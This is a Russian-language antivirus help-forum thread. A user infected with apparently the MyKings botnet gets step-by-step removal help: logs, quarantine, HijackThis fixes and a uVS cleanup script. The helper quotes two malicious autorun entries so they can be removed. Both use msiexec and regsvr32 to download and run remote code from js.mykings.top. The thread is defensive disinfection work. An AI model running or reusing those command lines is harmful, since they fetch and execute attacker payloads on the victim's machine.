Caonabo 0 Опубликовано 23 мая, 2017 Share Опубликовано 23 мая, 2017 (изменено) Так как длится этот хаос на моем компьютере уже некоторое время, полностью описать хронологию событий вряд ли смогу. В один прекрасный день антивирус(360 Total Security) заблокировал процесс, с именем состоящим только из цифр, расположенный в корневом каталоге диска С. После этого через некоторое время началась полная вакханалия. Антивирус начал регулярно блокировать процесс с именем net1.exe, который якобы пытается изменить какой-то пароль. При этом в это же время происходят различные изменения в реестре, одно из этих изменений - внесение в автозагрузку двух процессов, а именно, msiexec.exe и regsvr32.exe, оба имеют дальше в названии адрес сайта(даю только часть адреса) - js.mykings, я плохо разбираюсь в компьютерах, но мне показалось что этого там быть не должно, по этому адресу начал искать подобные проблемы у других людей, и нашел их немало. Помимо процессов в автозагрузке, добавляется скрипт в программу system32\wbem\wbemtest,exe, в названии этого скрипта присутствует мат, его я удалил, процессы из автозагрузки убрал, какое-то время ничего не происходило. Но к концу дня все вернулось обратно. Вчера помимо этого, появилось два exe процесса в папке Temp, один из них создал файл 360.cn в папке Program Files\Google, антивирус заблокировал процесс, он выдал ошибку приложения, я его закрыл, и больше он о себе не давал знать, но файлы не удалял. Сегодня снова появился файл с сомнительным названием в корневом каталоге диска C, он создал процесс с именем win32.exe в папке system32, антивирус расценил его как Trojan.Generic и удалил, но файл который создал этот процесс, так и остался в корневом каталоге, его ни я, ни антивирус не удалял. Теперь некоторые особенности и ссылки на ресурсы, которые имеют полезную информацию и лучше объяснят в чем проблема. -иногда в процессах ненадолго всплывают два от Adobe - acrord32.exe или что-то вроде того. -процесс net1.exe, после которого вносятся изменения в реестр, появляется раз в 3 часа, но иногда это время может отклоняться в большую или меньшую сторону -когда проходят 3 часа и вирус начинает свою магию, в диспетчере устройств фигурируют процессы с непонятными именами. -вирус вероятно попадает на ПК через ту же уязвимость что и WannaCry, но после того как он там оказывается, он сам эту дыру блокирует, чтобы ему не мешали. ссылка на блог в котором описывается проблема, там есть некоторые технические подробности, он на английском, к тому же я плохо разбираюсь в компьютерах, но для знающих людей это может быть полезно - https://www.cyphort.com/eternalblue-exploit-actively-used-deliver-remote-access-trojans/ ссылка на форум Dr. Web, конкретно в этом сообщении такая же проблема как и у меня, но там есть еще некоторые детали, по поводу которых я не уверен(Mysa, IUSR_Servs) - https://forum.drweb.com/index.php?showtopic=327461&p=827106 ссылка на сообщение, в котором такая же проблема и вероятное ее решение - https://forum.drweb.com/index.php?showtopic=327526&p=827994, обратите внимание на скрипт приведенный там, как минимум много общего с моей ситуацией. Сегодня я отключил Службу Сервер + поставил патч закрывающий уязвимость, дало ли это какие-то плоды сейчас сказать не могу, возможно вирус вообще попал на ПК как-то иначе. CollectionLog-2017.05.23-18.50.zip Изменено 23 мая, 2017 пользователем Caonabo Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 23 мая, 2017 Share Опубликовано 23 мая, 2017 1) - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь. 2) "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): O4 - MSConfig\startupreg: [start1] C:\WINDOWS\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/05/23) O4 - MSConfig\startupreg: [start] C:\WINDOWS\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/05/23) 3) пожалуйста, сделайте лог AutoRunsСкачайте утилиту, распакуйте. Запустите правой кнопкой от имени администратора.В меню Options - Scan Options поставьте все галочки - нажмите Rescan.Остальные настройки не трогайте. После этого дождитесь окончания создания списка. Сохраните лог - файл с расширением .arnЗаархивируйте его выложите его тут. 4) Сделайте полный образ автозапуска uVS, только программу скачайте отсюда. 1 1 Цитата Ссылка на сообщение Поделиться на другие сайты
Caonabo 0 Опубликовано 23 мая, 2017 Автор Share Опубликовано 23 мая, 2017 Сначала мне нужно выключить антивирус, потом запустить браузер и сомнительные приложения, и только потом AVZ? И обязательно запускать приложения которые наверняка являются вирусами? Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 23 мая, 2017 Share Опубликовано 23 мая, 2017 Можете ничего не запускать, выполнить скрипт как есть (с тем что и так у вас запущено). Цитата Ссылка на сообщение Поделиться на другие сайты
Caonabo 0 Опубликовано 23 мая, 2017 Автор Share Опубликовано 23 мая, 2017 Не помню пароля от учетки админа, застрял на третьем пункте. Цитата Ссылка на сообщение Поделиться на другие сайты
Caonabo 0 Опубликовано 24 мая, 2017 Автор Share Опубликовано 24 мая, 2017 (изменено) Запустил AutoRuns он сам начал сканирование, я дождался окончания, затем зашел в Options - Scan Options, поставил галочки во всех пунктах, нажал Rescan, после этого появляется список в котором только 1 пункт, это не то что нам нужно, верно? Изменено 24 мая, 2017 пользователем Caonabo Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 24 мая, 2017 Share Опубликовано 24 мая, 2017 Ок, пришлите лог со снятыми галочками. И главное про лог uVS не забудьте. Цитата Ссылка на сообщение Поделиться на другие сайты
Caonabo 0 Опубликовано 24 мая, 2017 Автор Share Опубликовано 24 мая, 2017 (изменено) Нужно ли было отключать антивирус во время создания лога uVS? Во время работы программы антивирус вывел сообщение что она пытается изменить какой-то сертификат, и не дал этого сделать, тем не менее она закончила свою работу, написала что лог успешно создан. Что делать? К тому же после работы программы в диспетчере задач появился процесс wlvjnc, что это такое? Изменено 24 мая, 2017 пользователем Caonabo Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 24 мая, 2017 Share Опубликовано 24 мая, 2017 Перед запуском хелперских утилит надо отключать. Цитата Ссылка на сообщение Поделиться на другие сайты
Caonabo 0 Опубликовано 24 мая, 2017 Автор Share Опубликовано 24 мая, 2017 Т.е мне переделать лог и пусть меняет тот сертификат? А с процессом тем что? Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 24 мая, 2017 Share Опубликовано 24 мая, 2017 ДА. А с процессом тем что? Это от утилиты. Делайте просто что указано, а то у вас одни вопросы уже целую неделю Цитата Ссылка на сообщение Поделиться на другие сайты
Caonabo 0 Опубликовано 24 мая, 2017 Автор Share Опубликовано 24 мая, 2017 https://virusinfo.info/virusdetector/report.php?md5=97198CEF45CF119C2118BCC7D1DC410F uVS Log.7z AutoRuns Log.zip Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 24 мая, 2017 Share Опубликовано 24 мая, 2017 1) Auslogics BoostSpeed, McAfee Security Scan Plus, Java 6 Update 30 - деинсталируйте. 2) Выполните скрипт в uVS ;uVS v4.0.5 [http://dsrt.dyndns.org] ;Target OS: NTv5.1 v400c BREG delref WMI_.[FUCKYOUMM2_FILTER] restart 3) Сделайте свежий образ автозапуска. 1 1 Цитата Ссылка на сообщение Поделиться на другие сайты
Caonabo 0 Опубликовано 24 мая, 2017 Автор Share Опубликовано 24 мая, 2017 (изменено) Свежий лог uVS Log2.7z Изменено 24 мая, 2017 пользователем Caonabo Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 25 мая, 2017 Share Опубликовано 25 мая, 2017 что с проблемой? Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.